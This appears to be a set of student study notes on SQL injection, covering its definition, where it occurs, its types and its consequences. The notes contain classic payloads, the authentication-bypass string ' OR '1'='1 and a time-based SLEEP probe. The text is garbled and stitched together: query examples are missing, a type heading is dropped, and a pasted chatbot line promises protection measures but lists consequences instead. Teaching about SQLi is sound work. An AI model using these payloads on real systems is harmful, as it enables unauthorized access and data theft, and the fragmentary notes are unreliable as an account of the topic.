SQL Injection
SQL Injection
Definition:
SQL Injection (SQLi) is a code injection attack where attackers insert malicious SQL
code into input fields (like username or password) to manipulate the backend
database.
Why it works:
SQL does not separate data from commands. So, when user input is directly
inserted into an SQL query, the database may interpret it as part of the SQL command.
Where it occurs:
o Login forms
o Search boxes
o URL query strings
o Any area where user input is used to build SQL queries
Example:
Normal query:
Injected input:
username='john' OR '1'='1'
Modified query:
o Bypass authentication
o View, modify, or delete sensitive data
o Execute database administration operations
o Read system files on the server
o Execute OS-level commands (in some cases)
Types of SQL Injection (SQLi)
a. Error-based SQLi
b. Union-based SQLi
Injects queries that cause a delay in the server response if the condition is true.
Example: IF(condition, SLEEP(5), 0)
Measures response time to infer data.
Useful when there’s no visual change in the app response.
3⃣ Out-of-band SQLi
Here’s a point-wise explanation of the topic "Protection Against SQL Injection (SQLi)
Attacks" and its consequences, based on your input — ideal for a 16-mark question format.
1. Loss of Confidentiality
o Sensitive data like usernames, passwords, credit card numbers can be leaked.
2. Bypass Authentication
o Attackers can log in as other users without knowing passwords (e.g., using ' OR
'1'='1).
3. Authorization Bypass
o Attackers can elevate privileges or access areas/data they’re not supposed to.
4. Loss of Integrity
o Data can be modified or deleted — affecting trust and system reliability.